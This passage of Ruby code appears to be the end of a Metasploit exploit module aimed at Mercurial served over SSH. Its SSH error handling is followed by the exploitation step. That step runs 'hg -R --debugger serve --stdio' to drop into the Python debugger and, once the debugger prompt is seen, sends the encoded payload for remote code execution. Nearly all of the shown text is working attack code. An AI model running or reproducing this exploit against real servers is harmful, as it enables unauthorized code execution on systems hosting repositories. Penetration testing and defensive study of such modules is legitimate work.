      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      print_good("SSH connection is established.")
      ssh.open_channel do |ch|
        ch.exec "hg -R --debugger serve --stdio" do |ch, success|
          ch.on_extended_data do |ch, type, data|
            if data.match(/entering debugger/)
              print_good("Triggered Debugger (#{data})")
              ch.send_data "#{payload.encoded}\n"
            else
              print_bad("Unable to trigger debugger (#{data})")
            end
          end
        end
      end

      begin
        ssh.loop unless session_created?
      rescue Errno::EBADF => e
        elog(e.message)
      end
    end
  end
end